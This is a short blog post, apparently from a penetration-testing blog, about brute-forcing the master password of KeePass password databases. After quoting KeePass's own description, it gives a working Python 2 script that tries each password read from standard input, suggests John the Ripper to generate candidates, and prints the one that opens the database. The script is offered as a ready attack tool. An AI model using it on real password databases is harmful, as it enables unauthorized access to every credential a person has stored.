Wednesday, August 3, 2011

Brute-forcing Keepass password key-chains

From the website:

KeePass is a free open source password manager, which helps you to manage your passwords in a secure way. You can put all your passwords in one database, which is locked with one master key or a key file. So you only have to remember one single master password or select the key file to unlock the whole database. The databases are encrypted using the best and most secure encryption algorithms currently known (AES and Twofish).

This open source password manager is available on Window, Mac, Linux, Android and iPhone. Hence, chances are that we will find one of these keychain files during a pen-test.


Looking for ways to brute-force the password I stumbled across with this python implementation that is able to read the file and dump its contents. It should not be very inefficient since it is using pycrypto, that is implemented in C.


The code is fairly simple and expects the list of passwords  in the standard input.  One possibility is to use John the Ripper for this task :)

You can find the code below.



#! /usr/env/python

#https://github.com/brettviren/python-keepass

# reads a list of passwords from the standard input
# john the ripper may be used to feed the application

from keepass import kpdb
import sys
import fileinput

for line in sys.stdin:
        passwd=line.strip("\n")

        try:
                db = kpdb.Database(sys.argv[1],passwd)
                print "Valid password found for %s : %s" % (sys.argv[1],passwd)
                sys.exit(0)
        except ValueError:
                pass

No comments:

Post a Comment